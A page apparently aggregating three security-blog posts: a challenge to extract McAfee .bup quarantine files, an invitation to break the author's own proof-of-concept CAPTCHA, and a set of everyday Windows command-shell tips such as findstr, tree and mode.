We provided two different methods for extracting a McAfee Bup tool in Linux. It may not be the most graceful solution—but it works and it did not take much time to hack up. However, we are looking for options that would be useful to others. If you have some options, please feel free to state what you would find useful.

Additionally, these scripts (bash and Perl) fit the bill for us—but it may not meet the needs for those without the 7zip extractor (bash and perl) or xxd (bash script only) utility. Our challenge to anyone that wants to geek out is the following:
  1. Reduce the dependencies (No need for 7zip or xxd)
  2. Code it in your favorite language (python, ruby, C, LUA… whatever you want)
  3. Be as concise and clear as possible

One hint to anyone who gets started on manually parsing the format:

 hexdump -C 7dc7ed19123df0.bup | head -n 1

00000000 d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 |................|





Feel free to post back. :) Happy hacking!

Can You Break My CAPTCHA?

$
0
0
By Gursev Kalra.

I wrote a simple CAPTCHA scheme and wanted to share it with the awesome security community as a CAPTCHA breaking exercise. To solve the CAPTCHA an individual (or machine) will have to enter only the characters with a white border and ignore other text. I understand that at this stage the lettering may sometimes be hard to read, we're working on that, but for now, lets see how far we can get with this POC design. Here are a couple:




Anti-Automation Mechanisms

The main intent was to make Noise removal, Segmentation and Classification interdependent and increase the complexity of automatic solvers. Here are the anti-automation mechanisms in this CAPTCHA:

  1. Closeness of noise to real text : The noise is of same style (i.e. alphanumeric) and superimposed on the real text. The font is of same size as original text and the text to be solved. This increases the difficulty of removing the noise and regular noise removal algorithms may be ineffective. The random background line serves to highlight the white border and also as a noise source.
  2. Hard to Segment : The CAPTCHA solution and noise are mixed up in an unpredictable fashion with random positioning variation on X and Y axis. It may therefore be hard to segment various alphabets from each other single out individual characters for classification.
  3. Anti-Classification :While writing custom solvers, statistical analysis is performed to on CAPTCHA text by plotting the pixel densities against X and Y axis to identify the correct characters. When text is superimposed with no clear indication on demarcation of text boundary, the classification techniques do not work.


Samples

You can find 200 samples for download here:


Where to start?

Since this is a new scheme, you may not be able to use any of the popular CAPTCHA breaking tools out there to defeat it. Instead, one approach is to use a graphics editing software like Adobe Photoshop to modify a sample. Once you have a set of actions (e.g. apply effect X then apply filter Y) that you can repeat on multiple samples to reliably solve them - you have a potential solution! Then just post your solution or questions in the comments below and we can discuss!


Simple but Extremely Useful Windows Tricks

$
0
0
By Tony Lee and Matt Kemelhar.

Navigating Windows in the most efficient manner possible can be seen as wizardry-- it almost seems as if Microsoft tries to make it increasingly more difficult to accomplish simple things. However, there are plenty of very useful tricks and shortcuts built into Windows, the problem is they are not publicized very well. Students in our Ultimate Hacking Courses usually find these Windows tips useful, so we figured we would share them.

Command shell history

If you thought “doskey /history” was cool—this is even better and more useful. Function keys help control and recall the command history in Windows. We have noted the most useful keys and their function below. Try them out for yourself.

F7 – Graphical command shell history After hitting F7, you can use the arrow keys to scroll up and down through the command history and then use the right key in order to edit the command or hit enter to run the command. The screenshot below shows a graphical command history is presented after the user presses F7. This can be navigated via arrow keys.



F1 – Letter by letter repeat of the last command

F2 – Retype letters up to a certain letter

F3 – Retype last command

F4 – Delete characters from the cursor up to a certain character

F5 – Scroll up through command history (same as up arrow)

F9 – Enter the command number you would repeat

Command shell shortcuts

Adjusting the command shell to fit your preference can sometimes be a headache (too much clicking for a shell) here are some ways to customize the view without touching the mouse

mode – adjusting the size of the command shell

This is often very useful when running commands whose output extends beyond the 80 character default width of the unaltered command shell.

Syntax: mode [width],[height]

Ex: mode 120,120

This screenshot shows you what it looks like to expand the window quickly with mode.



color - Sets the default console foreground and background colors

This is very useful when setting different color shells to indicate different functionality.

COLOR [attr]
attr Specifies color attribute of console output

Color attributes are specified by TWO hex digits -- the first corresponds to the background; the second the foreground. Each digit can be any of the following values:

0 = Black 8 = Gray
1 = Blue 9 = Light Blue
2 = Green A = Light Green
3 = Aqua B = Light Aqua
4 = Red C = Light Red
5 = Purple D = Light Purple
6 = Yellow E = Light Yellow
7 = White F = Bright White

If no argument is given, this command restores the color to what it was when CMD.EXE started.




The screenshot below shows two different windows with two different colors with netcat listeners on different ports.



Title - Sets the window title for the command prompt window

This is also useful for labeling your windows with a title that is easy to remember and descriptive of what you are working on.

TITLE [string] string       Specifies the title for the command prompt window.



Let's see what this looks like - the screenshot below shows how to change the title of the window via the command line



findstr – (grep for Windows)

findstr searches for strings in files [or anything else]. If you wanted grep in Windows, you got it. findstr has been present in Windows since XP and 2003. It accepts regular expressions and can search case insensitive (/I). One of our favorite ways to use this command is for filtering—especially long lists such as process listings and listening ports.

Process lists:
C:\>tasklist | findstr /i EXPLORER
explorer.exe 3404 Console 1 119,884 K



Port lists:
C:\>netstat -an | findstr 135
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP [::]:135 [::]:0 LISTENING

C:\>netstat -an | findstr 445
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP [::]:445 [::]:0 LISTENING
UDP 127.0.0.1:63445 *:*



write - the greatest shortcut ever

Prefer WordPad over Notepad at times?

Want to launch it from the command line, but you hate typing the full path (c:\Program Files\Windows NT\Accessories\wordpad.exe c:\Program Files (x86)\Windows NT\Accessories\wordpad.exe) to launch it?
How about five letters? w r i t e



tree – graphical “text” directory listings

Ever wanted to dump the contents of a particular directory or structure to a text file? tree is the way to go—it is fast and recursive. The “/F” attribute will list the files in addition to the folders—leave it off and you just get the folders. "/A" is useful if you are sending output to a text file or other document.

TREE [drive:][path] [/F] [/A]

/F Display the names of the files in each folder.
/A Use ASCII instead of extended characters.


C:\> tree /a /f c:\users

Folder PATH listing for volume PSV
Volume serial number is 8800-000
C:\USERS
+---Tony
| | test.exe
| | Sti_Trace.log
| |
| +---Contacts
| | Tony.contact
| |
| +---Desktop
| | | cmd.txt
| | | fixPrinter.bat
| | | malicious.exe
| | | research.txt
--snip--





type - when you can’t spare the GUI

If you live in the command line and don’t want to spawn a graphical text editor to read a simple file, you can always “type” the file. This is similar to “cat” in *nix. If you need to read larger documents, it can be piped to more or just use more to read the file in the first place.

TYPE [drive:][path]filename

C:\>type %TEMP%\readme.txt
"This is how you can read a text file from the command line"





Those are some of our favorite tricks to make Windows more convenient to use! Hopefully there was at least one trick here that is new for you.

Do you have any tricks that amaze others? Share them in the comments below!

Viewing all 107 articles
Browse latest View live